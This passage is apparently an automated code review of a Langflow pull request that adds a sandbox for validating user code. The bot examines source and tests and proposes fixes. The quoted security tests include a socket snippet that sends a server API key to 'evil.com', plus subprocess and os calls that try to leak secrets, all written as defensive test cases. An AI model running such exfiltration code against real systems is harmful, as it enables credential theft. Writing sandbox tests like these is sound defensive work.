find . -name "sandbox.py" -type f | head -5Length of output: 35
🏁 Script executed:
#!/bin/bash
# Find the test file mentioned in the review
find . -name "test_validate.py" -type f | head -5Length of output: 151
🏁 Script executed:
#!/bin/bash
# Examine the validate.py file under review (lines 1-80 for context)
cat ./src/lfx/src/lfx/custom/validate.py | head -80Length of output: 2960
🏁 Script executed:
#!/bin/bash
# Examine sandbox.py to understand exception types and create_isolated_import behavior
cat ./src/lfx/src/lfx/custom/sandbox.pyLength of output: 8868
🏁 Script executed:
#!/bin/bash
# Search for test_code_with_multiple_imports in test files
rg -n "test_code_with_multiple_imports" ./src/backend/tests/unit/utils/ ./src/lfx/tests/Length of output: 98
🏁 Script executed:
#!/bin/bash
# Examine the test file to see test_code_with_multiple_imports expectations
cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '123,160p'Length of output: 1431
🏁 Script executed:
#!/bin/bash
# Get more context around that test, including imports and setup
cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '1,50p'Length of output: 1298
🏁 Script executed:
#!/bin/bash
# Search for other tests that check import errors count
rg -n "imports.*errors" ./src/backend/tests/unit/utils/test_validate.py -A 2 -B 2Length of output: 1276
🏁 Script executed:
#!/bin/bash
# Check the other tests that expect empty imports errors or specific counts
cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '55,92p'Length of output: 1192
🏁 Script executed:
#!/bin/bash
# Check if there's any setup/teardown that sets the environment variable
rg -n "LANGFLOW_ALLOW_DANGEROUS_CODE" ./src/backend/tests/unit/utils/test_validate.pyLength of output: 0
🏁 Script executed:
#!/bin/bash
# Check if this test file has any class setup or pytest fixtures
grep -n "setUp\|@pytest.fixture\|@classmethod" ./src/backend/tests/unit/utils/test_validate.py | head -20Length of output: 0
🏁 Script executed:
#!/bin/bash
# Verify the exact lines in validate.py where exception handling occurs (51-73)
cat ./src/lfx/src/lfx/custom/validate.py | sed -n '51,75p'Length of output: 1298
🏁 Script executed:
#!/bin/bash
# Double-check that os and sys are indeed in BLOCKED_MODULES
grep -n "\"os\"\|\"sys\"" ./src/lfx/src/lfx/custom/sandbox.pyLength of output: 26
Update test expectations for new sandbox behavior in test_code_with_multiple_imports
The sandboxing change correctly surfaces blocked modules (e.g., os, sys) as import errors via SecurityViolation, which is caught by the generic except Exception handler. However, test_code_with_multiple_imports imports both os and sys (both in BLOCKED_MODULES) and expects exactly 2 errors for nonexistent modules only. After this change, the test will receive 4 errors: os, sys, nonexistent1, and nonexistent2, causing the assertion assert len(result["imports"]["errors"]) == 2 to fail.
Suggested fixes:
- Update the test to either:
- Remove
osandsysfrom the test code if only testing nonexistent modules - Update the assertion to expect 4 errors if the intent is testing mixed scenarios
- Remove
- Or, distinguish between
SecurityViolationandModuleNotFoundErrorin validate.py if dangerous modules should not be counted as validation errors (though blocking them at import time is better for security)
Test file: ./src/backend/tests/unit/utils/test_validate.py (lines 123-138)
🤖 Prompt for AI Agents
In src/lfx/src/lfx/custom/validate.py around lines 11-12, the sandbox now raises
SecurityViolation for blocked modules (e.g., os, sys) which are being caught by
the generic exception handler and counted as import errors, causing tests that
expect only ModuleNotFoundError counts to fail; to fix, either update the unit
test ./src/backend/tests/unit/utils/test_validate.py (lines 123-138) to remove
os/sys from the test input or change the assertion to expect 4 errors, or modify
validate.py to catch SecurityViolation separately and either skip adding it to
imports["errors"] or classify it under a distinct imports["blocked"] key
(implement by adding an except SecurityViolation: branch that handles/filters
those exceptions before the generic except Exception).
| def test_sandbox_cannot_access_parent_globals(): | ||
| """Test that sandboxed code cannot access parent function's globals.""" | ||
| # Set a variable in the parent scope | ||
| parent_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access parent_var from parent scope | ||
| # If isolation were broken, this would work | ||
| return parent_var | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| # Execute in sandbox | ||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Try to call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError because parent_var is not accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_modify_parent_globals(): | ||
| """Test that sandboxed code cannot modify parent scope's globals.""" | ||
| parent_dict = {"value": "original"} | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to modify parent_dict | ||
| # If isolation were broken, this would modify the real parent_dict | ||
| parent_dict["value"] = "modified" | ||
| return parent_dict["value"] | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function - should fail because parent_dict is not accessible | ||
| test_func = exec_globals["test"] | ||
|
|
||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
| # Verify parent_dict was not modified | ||
| assert parent_dict["value"] == "original" | ||
|
|
||
|
|
||
| def test_sandbox_isolated_builtins(): | ||
| """Test that sandbox uses isolated builtins, not real ones.""" | ||
| # Create a marker in real builtins (simulating server state) | ||
| import builtins | ||
| original_builtins_len = len(dir(builtins)) | ||
|
|
||
| code = """ | ||
| def test(): | ||
| import builtins | ||
| # Try to access real builtins | ||
| # If isolation were broken, we could modify real builtins | ||
| builtins.ESCAPE_TEST = "should_not_exist" | ||
| return hasattr(builtins, 'ESCAPE_TEST') | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
| result = test_func() | ||
|
|
||
| # Should return False or True but not affect real builtins | ||
| # Verify real builtins wasn't modified | ||
| assert not hasattr(builtins, "ESCAPE_TEST") | ||
| assert len(dir(builtins)) == original_builtins_len | ||
|
|
||
|
|
||
| def test_sandbox_fresh_namespace_per_execution(): | ||
| """Test that each execution gets a fresh isolated namespace.""" | ||
| code1 = """ | ||
| GLOBAL_VAR = "first_execution" | ||
| def test(): | ||
| return GLOBAL_VAR | ||
| """ | ||
| code_obj1 = compile(code1, "<test>", "exec") | ||
| exec_globals1 = {} | ||
| execute_in_sandbox(code_obj1, exec_globals1) | ||
|
|
||
| # Second execution with different code | ||
| code2 = """ | ||
| def test(): | ||
| # Try to access GLOBAL_VAR from previous execution | ||
| # If isolation were broken, this would work | ||
| return GLOBAL_VAR | ||
| """ | ||
| code_obj2 = compile(code2, "<test>", "exec") | ||
| exec_globals2 = {} | ||
| execute_in_sandbox(code_obj2, exec_globals2) | ||
|
|
||
| # Should raise NameError because GLOBAL_VAR doesn't exist in this execution | ||
| test_func = exec_globals2["test"] | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_access_frame_locals(): | ||
| """Test that sandboxed code cannot access caller's local variables.""" | ||
| def caller_function(): | ||
| local_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access local_var from caller | ||
| # If isolation were broken, this would work | ||
| return local_var | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError because local_var is not accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
| caller_function() | ||
|
|
||
|
|
||
| def test_sandbox_isolated_imports(): | ||
| """Test that imports in sandbox are isolated from parent scope.""" | ||
| # Set up a mock module in parent scope (simulating server state) | ||
| import sys | ||
| original_modules = set(sys.modules.keys()) | ||
|
|
||
| code = """ | ||
| import json | ||
| def test(): | ||
| # Import json - should be isolated | ||
| return json.__name__ | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
| result = test_func() | ||
|
|
||
| # Should work but json import should be isolated | ||
| assert result == "json" | ||
|
|
||
| # Verify we didn't accidentally modify sys.modules in a way that persists | ||
| # (though importlib.import_module does modify sys.modules, the key is that | ||
| # the sandbox's view of modules is isolated) | ||
| current_modules = set(sys.modules.keys()) | ||
| # New modules might be added, but that's expected for imports | ||
|
|
||
|
|
||
| def test_sandbox_function_definition_time_isolation(): | ||
| """Test that function definition time code (default args) executes in isolation.""" | ||
| parent_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| def test(x=parent_var): | ||
| # Default argument evaluation happens at definition time | ||
| # If isolation were broken, parent_var would be accessible | ||
| return x | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| # Execute in sandbox - definition time code runs here | ||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Try to call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError when function is defined (default arg evaluation) | ||
| # OR when called without args | ||
| # The key is that parent_var is not accessible during definition | ||
| with pytest.raises(NameError): | ||
| test_func() # Calling without args triggers default arg evaluation | ||
|
|
||
|
|
||
| def test_sandbox_decorator_isolation(): | ||
| """Test that decorator evaluation happens in isolation.""" | ||
| parent_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| @(parent_var or lambda f: f) | ||
| def test(): | ||
| return 1 | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| # Execute in sandbox - decorator evaluation happens here | ||
| # Should raise NameError because parent_var is not accessible | ||
| with pytest.raises(NameError): | ||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
Tests assume exec_globals is populated by execute_in_sandbox, but the implementation does not do that
All of these tests follow the pattern:
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]
test_func()However, execute_in_sandbox currently creates an internal sandbox_globals dict, updates it with exec_globals, and executes the code there without writing any new names (like test) back into exec_globals. As written, exec_globals["test"] will raise KeyError, so the assertions about NameError and isolation never actually run.
To make these tests exercise the real contract of execute_in_sandbox, you probably want one of:
- Change
execute_in_sandboxto treatexec_globalsas the sandbox globals (and let exec populate it), or to return the sandbox namespace so tests can pull outtestfrom the returned dict, or - Restructure tests to assert on exceptions raised directly from
execute_in_sandbox(e.g., have the code string calltest()at module top level so aNameErroroccurs during exec), instead of trying to retrieve and call the function afterwards.
Also, test_sandbox_isolated_builtins assumes that mutating builtins inside the sandbox cannot affect the process‑wide builtins module. Given create_isolated_import currently delegates to importlib.import_module, you may still be importing the real builtins module inside the sandbox; verify this expectation against the actual sandbox implementation.
---
🏁 Script executed:
```shell
#!/bin/bash
# Find sandbox-related files and the execute_in_sandbox function
fd -t f "sandbox" --type python | head -20
Length of output: 173
🏁 Script executed:
#!/bin/bash
# Search for execute_in_sandbox definition
rg -n "def execute_in_sandbox" --type pythonLength of output: 30
🏁 Script executed:
#!/bin/bash
# Search for create_isolated_import and create_isolated_builtins
rg -n "def create_isolated_(import|builtins)" --type pythonLength of output: 30
🏁 Script executed:
#!/bin/bash
# Verify the test file exists and show first few test patterns
cat src/lfx/tests/unit/custom/test_sandbox_isolation.py | head -60Length of output: 1759
---
🏁 Script executed:
```shell
#!/bin/bash
# Find sandbox.py or related sandbox implementation
fd sandbox -e py
Length of output: 136
🏁 Script executed:
#!/bin/bash
# Search for execute_in_sandbox definition with correct syntax
rg -n "def execute_in_sandbox" -g "*.py"Length of output: 114
🏁 Script executed:
#!/bin/bash
# Search for sandbox-related imports and implementations
rg -n "execute_in_sandbox|create_isolated" -g "*.py" -A 5Length of output: 13244
🏁 Script executed:
#!/bin/bash
# Look for the custom module structure
find . -type d -name custom | head -10Length of output: 119
---
🏁 Script executed:
```shell
#!/bin/bash
# Get full execute_in_sandbox implementation
sed -n '176,250p' src/lfx/src/lfx/custom/sandbox.py
Length of output: 2592
🏁 Script executed:
#!/bin/bash
# Get create_isolated_builtins implementation
sed -n '88,139p' src/lfx/src/lfx/custom/sandbox.pyLength of output: 2274
🏁 Script executed:
#!/bin/bash
# Get create_isolated_import implementation
sed -n '140,175p' src/lfx/src/lfx/custom/sandbox.pyLength of output: 1712
🏁 Script executed:
#!/bin/bash
# Check the full sandbox.py to see how sandbox_globals is used
wc -l src/lfx/src/lfx/custom/sandbox.pyLength of output: 37
Tests assume exec_globals is populated after execute_in_sandbox() returns, but the implementation does not do this
The core issue: execute_in_sandbox creates an internal sandbox_globals dict, merges exec_globals into it (line 218), executes code in that dict, and returns None without writing anything back to exec_globals. All tests then try to access exec_globals["test"], which will raise KeyError before any isolation assertions run.
Every test in this module follows the failing pattern:
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"] # KeyError - exec_globals was never modifiedTo fix this, either:
- Modify
execute_in_sandboxto return the sandbox namespace (or write it back toexec_globals), or - Restructure tests to assert on exceptions during
execute_in_sandboxitself (e.g., have code call the test function at module level soNameErroroccurs during exec)
Additionally, create_isolated_import uses importlib.import_module(), which returns the real builtins module, not the IsolatedBuiltinsModule wrapper. This means code that does import builtins gets the actual module, and mutations inside the sandbox could affect the process-wide builtins. Verify whether this matches your isolation intent.
🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_isolation.py around lines 11-218,
tests assume execute_in_sandbox populates the passed exec_globals with the
executed namespace but the current implementation builds an internal
sandbox_globals, executes into it and returns None (line ~218), leaving
exec_globals empty and causing KeyError; fix by changing execute_in_sandbox to
either write the final sandbox namespace back into the provided exec_globals
dict (e.g., clear exec_globals and update it with sandbox_globals) or return the
sandbox namespace and update callers/tests accordingly so exec_globals["test"]
exists after execution; also address create_isolated_import returning real
modules (not wrappers) by ensuring the sandboxed import mechanism injects
isolated module objects (or a wrapped builtins module) into the sandbox's
sys.modules/builtins mapping during exec so an in-sandbox "import builtins"
yields the isolated builtins rather than the process-wide one.
| def test_sandbox_cannot_access_server_python_secrets(): | ||
| """CRITICAL: Test that sandboxed code cannot access server's Python variables/secrets. | ||
| This is the KEY security property - code cannot access server secrets stored in memory. | ||
| Even if code can do file I/O or network requests, it can't access server secrets to exfiltrate. | ||
| """ | ||
| # Simulate server secrets stored in Python variables | ||
| server_api_key = "sk-secret-key-12345" | ||
| server_db_password = "db_password_secret" | ||
| server_config = { | ||
| "api_key": server_api_key, | ||
| "database_url": "postgresql://user:password@localhost/db" | ||
| } | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access server's Python variables containing secrets | ||
| # If isolation is broken, these would be accessible | ||
| return server_api_key, server_db_password, server_config | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # CRITICAL: Should raise NameError - server secrets are not accessible | ||
| # This is what prevents credential theft | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_access_server_credentials_via_python(): | ||
| """Test that code cannot access server credentials stored in Python variables. | ||
| Even if code can do file I/O or network requests, it can't access server secrets | ||
| stored in Python variables to exfiltrate them. | ||
| """ | ||
| # Simulate server storing credentials in Python variables | ||
| class ServerConfig: | ||
| def __init__(self): | ||
| self.api_key = "sk-secret-12345" | ||
| self.database_url = "postgresql://user:pass@localhost/db" | ||
| self.secret_token = "token_secret_xyz" | ||
|
|
||
| server_config = ServerConfig() | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access server's credential objects | ||
| # If isolation is broken, we could access server_config.api_key | ||
| return server_config.api_key | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # CRITICAL: Should raise NameError - server_config is not accessible | ||
| # This prevents credential theft even if code can do file I/O or network requests | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_access_server_python_state(): | ||
| """Test that code cannot access server's Python state, even if it can access system resources. | ||
| This is the key security property: namespace isolation prevents access to server secrets | ||
| stored in Python variables, even though code can access system resources like os.environ. | ||
| """ | ||
| # Server stores secrets in Python variables (not just env vars) | ||
| server_secrets = { | ||
| "api_key": "sk-secret-from-python-var", | ||
| "db_password": "password-from-python-var" | ||
| } | ||
|
|
||
| code = """ | ||
| import os | ||
| def test(): | ||
| # Code CAN access os.environ (system resource) | ||
| env_key = os.environ.get('TEST_ENV_VAR', 'not_found') | ||
| # But code CANNOT access server's Python variables | ||
| # If isolation is broken, server_secrets would be accessible | ||
| python_secret = server_secrets['api_key'] | ||
| return env_key, python_secret | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| # Set env var to test that system resources ARE accessible | ||
| os.environ["TEST_ENV_VAR"] = "env_value" | ||
|
|
||
| try: | ||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError - server_secrets Python variable is not accessible | ||
| # This proves namespace isolation works, even though os.environ is accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
| finally: | ||
| if "TEST_ENV_VAR" in os.environ: | ||
| del os.environ["TEST_ENV_VAR"] | ||
|
|
||
|
|
||
| def test_sandbox_cannot_exfiltrate_secrets_via_commands(): | ||
| """Test that code cannot access server secrets to pass to system commands. | ||
| Code CAN execute system commands, but it CANNOT access server secrets | ||
| stored in Python variables to pass to those commands. | ||
| """ | ||
| # Server secret stored in Python variable | ||
| server_secret = "secret_password_12345" | ||
|
|
||
| code = """ | ||
| import subprocess | ||
| def test(): | ||
| # Code CAN execute commands | ||
| # But code CANNOT access server_secret to pass to command | ||
| # If isolation is broken, we could do: subprocess.run(['echo', server_secret]) | ||
| result = subprocess.check_output(['echo', server_secret], text=True) | ||
| return result.strip() | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # CRITICAL: Should raise NameError - server_secret is not accessible | ||
| # This prevents code from exfiltrating secrets via system commands | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_access_server_python_variables(): | ||
| """Test that sandboxed code cannot access server's Python variables/state. | ||
| This is what namespace isolation actually prevents. | ||
| """ | ||
| # Set a variable in the "server" scope | ||
| server_secret = "server_secret_value" | ||
| server_config = {"api_key": "secret_key_123"} | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access server's Python variables | ||
| # If isolation is broken, these would be accessible | ||
| return server_secret, server_config | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError - server variables are not accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_modify_server_python_state(): | ||
| """Test that sandboxed code cannot modify server's Python state.""" | ||
| server_state = {"modified": False} | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to modify server state | ||
| server_state["modified"] = True | ||
| return server_state | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError - server_state is not accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
| # Verify server state was not modified | ||
| assert server_state["modified"] is False | ||
|
|
||
|
|
||
| def test_sandbox_cannot_exfiltrate_secrets_via_network(): | ||
| """Test that code cannot access server secrets to send via network requests. | ||
| Code CAN make network requests, but it CANNOT access server secrets | ||
| stored in Python variables to send in those requests. | ||
| """ | ||
| # Server secret stored in Python variable | ||
| server_api_key = "sk-secret-key-to-exfiltrate" | ||
|
|
||
| code = """ | ||
| import socket | ||
| def test(): | ||
| # Code CAN make network requests | ||
| # But code CANNOT access server_api_key to send | ||
| # If isolation is broken, we could do: socket.send(server_api_key.encode()) | ||
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | ||
| s.connect(('evil.com', 1337)) | ||
| s.send(server_api_key.encode()) # Try to send server secret | ||
| s.close() | ||
| return 'sent' | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # CRITICAL: Should raise NameError - server_api_key is not accessible | ||
| # This prevents code from exfiltrating secrets via network requests | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
Security tests don’t match the current sandbox contract and may be brittle
A few intertwined issues here:
-
Namespace contract mismatch (same as isolation tests)
Every test does:exec_globals = {} execute_in_sandbox(code_obj, exec_globals) test_func = exec_globals["test"]
But
execute_in_sandboxbuilds its ownsandbox_globalsdict and never writes back intoexec_globals, soexec_globals["test"]will raiseKeyErrorbefore anyNameErroraboutserver_*variables can be observed. Either adjustexecute_in_sandboxto expose the sandbox namespace (e.g., by mutating or returning it) or rewrite the tests to assert on exceptions raised directly fromexecute_in_sandbox. -
Assumptions about dangerous modules being usable
Several tests assumeos,subprocess, andsocketimports succeed and that only access to server‑side Python variables is blocked. The sandbox implementation, however, is documented to block these modules by default unlessLANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATIONis enabled. Without that toggle set, these tests are likely to fail at import time with a security error rather than the intendedNameError. Consider:- Explicitly setting/resetting the env flag in a fixture for these tests, or
- Splitting tests to cover both “dangerous allowed” and “dangerous blocked” modes, asserting on the correct exception type in each.
-
Real subprocess/network usage in unit tests
subprocess.check_outputandsocket.connect/sendare being called for real. Even if the name‑resolution failure is ultimately what you want to assert, the code will still attempt to open processes and network connections first, which can make tests flaky or environment‑dependent. Stubbing these (e.g.,monkeypatchorpatchsubprocess.check_output/socket.socket) would keep the tests focused purely on namespace isolation semantics.
Overall, the intent of these tests is good, but they need to be brought in line with how execute_in_sandbox and the “dangerous modules” toggle actually behave.
I'll verify the review comment by examining the actual execute_in_sandbox implementation and related sandbox configuration.
---
🏁 Script executed:
```shell
#!/bin/bash
# Find execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type py -A 15
Length of output: 1394
🏁 Script executed:
#!/bin/bash
# Search for LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION usage
rg -n "LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION" --type py -C 2Length of output: 3463
🏁 Script executed:
#!/bin/bash
# Find sandbox module and dangerous modules handling
rg -n "dangerous.*module|block.*import" --type py -i -C 3Length of output: 15508
🏁 Script executed:
#!/bin/bash
# Check test file imports at the top of test_sandbox_security.py
head -n 30 src/lfx/tests/unit/custom/test_sandbox_security.pyLength of output: 1281
🏁 Script executed:
#!/bin/bash
# Search for where globals dict is populated or returned in sandbox
rg -n "exec_globals|sandbox_globals" --type py -B 2 -A 5 | head -100Length of output: 7723
I need to see the full implementation of execute_in_sandbox to verify whether it mutates exec_globals and when the dangerous module errors occur.
---
🏁 Script executed:
```shell
#!/bin/bash
# Get full execute_in_sandbox implementation
sed -n '176,210p' src/lfx/src/lfx/custom/sandbox.py
Length of output: 1518
🏁 Script executed:
#!/bin/bash
# Get the complete sandbox_globals creation and execution logic
sed -n '200,230p' src/lfx/src/lfx/custom/sandbox.pyLength of output: 1156
🏁 Script executed:
#!/bin/bash
# Look for where globals dict is populated after exec
rg -n "sandbox_globals\|exec_globals" src/lfx/src/lfx/custom/sandbox.py -A 3 -B 1Length of output: 0
🏁 Script executed:
#!/bin/bash
# Check if there are fixtures in test_sandbox_security.py that set the env var
grep -n "LANGFLOW_ALLOW_DANGEROUS_CODE\|monkeypatch\|setenv" src/lfx/tests/unit/custom/test_sandbox_security.pyLength of output: 0
I need to see the end of the execute_in_sandbox function to understand if exec_globals is mutated with the sandbox results.
---
🏁 Script executed:
```shell
#!/bin/bash
# Get the complete execute_in_sandbox function from line 230 onward
sed -n '230,250p' src/lfx/src/lfx/custom/sandbox.py
Length of output: 424
🏁 Script executed:
#!/bin/bash
# Get the entire execute_in_sandbox function in one view
awk '/^def execute_in_sandbox/,/^def [a-z_]/ {print NR": "$0}' src/lfx/src/lfx/custom/sandbox.py | head -80Length of output: 81
🏁 Script executed:
#!/bin/bash
# Count total lines in sandbox.py and get end of function
wc -l src/lfx/src/lfx/custom/sandbox.pyLength of output: 37
🏁 Script executed:
#!/bin/bash
# Get lines 230-260 to see exec call and what happens
sed -n '230,260p' src/lfx/src/lfx/custom/sandbox.pyLength of output: 424
Security tests won't pass with current sandbox implementation and are brittle
The review comment accurately identifies three real issues:
-
exec_globals dict is never populated (confirmed)
execute_in_sandboxmergesexec_globalsintosandbox_globalsat line 224, executes code insandbox_globals, but never writes results back. Tests callingexec_globals["test"]will raiseKeyErrorbefore assertions are reached. -
Dangerous modules fail at import time with
SecurityViolation(confirmed)
Tests assumeimport os,import subprocess,import socketsucceed. However, whenexec()runs the code at line 232, these imports triggercreate_isolated_import(), which raisesSecurityViolation(lines 155–160) becauseALLOW_DANGEROUS_CODEdefaults tofalse. The function re-raises this exception, so tests fail before reaching the intendedNameErrorassertions. No fixtures setLANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true. -
Real subprocess/network I/O (would occur if imports succeeded)
subprocess.check_outputandsocket.connect('evil.com', 1337)execute for real, making tests flaky and environment-dependent.
Recommendation: Either refactor execute_in_sandbox to populate exec_globals with the sandbox namespace results, or rewrite tests to assert on exceptions from execute_in_sandbox itself and use pytest fixtures to explicitly enable/disable dangerous modules for different test scenarios.
🧰 Tools
🪛 Gitleaks (8.29.0)
[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
[high] 66-66: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 23-256, the
tests fail because execute_in_sandbox does not write back the sandbox namespace
into the provided exec_globals, dangerous-module imports raise SecurityViolation
at exec time (so tests never reach NameError assertions), and tests allow real
subprocess/socket IO; fix by (1) updating execute_in_sandbox to merge the final
sandbox_globals back into the provided exec_globals so test_func is available to
callers, (2) change these tests to either enable dangerous imports via a
dedicated pytest fixture/env var when you intend to allow them or assert that
execute_in_sandbox raises SecurityViolation for blocked imports (instead of
expecting NameError), and (3) prevent real external IO by monkeypatching/mocking
subprocess and socket calls (or replace those test cases with mocks/stubs) so
tests remain deterministic and do not perform network/command execution.
| # Simulate server secrets stored in Python variables | ||
| server_api_key = "sk-secret-key-12345" | ||
| server_db_password = "db_password_secret" | ||
| server_config = { | ||
| "api_key": server_api_key, | ||
| "database_url": "postgresql://user:password@localhost/db" | ||
| } | ||
|
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hard‑coded “API key”‑like test strings will keep tripping secret scanners
Strings like "sk-secret-key-12345", "sk-secret-12345", and "sk-secret-key-to-exfiltrate" look like real API keys to tools such as gitleaks, which is already flagging them. Even though they’re harmless test values, they’ll continue to generate noise or block CI unless suppressed.
A low‑friction fix is to tweak them so they no longer match common key patterns, e.g.:
"sk-test-not-a-real-key-12345""dummy-secret-key"
or similar, or centralize them in a constant that scanners are configured to ignore.
Also applies to: 64-69, 100-102, 144-145, 175-177, 229-231
🧰 Tools
🪛 Gitleaks (8.29.0)
[high] 30-30: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Actionable comments posted: 9
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json (1)
2338-2355: Unsafe default: Allow Dangerous Deserialization is enabled.Defaulting allow_dangerous_deserialization to true can lead to arbitrary code execution when loading FAISS indexes. For a starter template, ship it disabled.
- BoolInput( - name="allow_dangerous_deserialization", - display_name="Allow Dangerous Deserialization", - ... - value=True, - ), + BoolInput( + name="allow_dangerous_deserialization", + display_name="Allow Dangerous Deserialization", + ... + value=False, + ),If you must load untrusted indexes, gate with environment flag and warn prominently in UI.
🧹 Nitpick comments (6)
src/backend/tests/unit/utils/test_validate.py (1)
54-151: Consider adding dedicated sandbox security tests.The PR introduces a security sandbox to block dangerous operations, but this test file doesn't appear to include tests that specifically verify sandbox blocking behavior. Consider adding tests for:
Blocked operations - Verify that dangerous operations are blocked:
- File system access (
open(),os.remove(),os.system())- Subprocess execution (
subprocess.run(),os.popen())- Network operations (
socket,urllib,requests)- Module imports (
__import__,importlibwith dangerous modules)Allowed operations - Verify safe operations still work:
- Standard math/string operations
- Safe stdlib modules (math, json, typing, etc.)
Global setting - The AI summary mentions "a new global setting controls whether dangerous code operations are permitted during validation." Add tests to verify:
- Setting can enable/disable dangerous operations
- Setting is respected by validation logic
Error handling - Verify appropriate errors are raised when blocked operations are attempted
Example test structure:
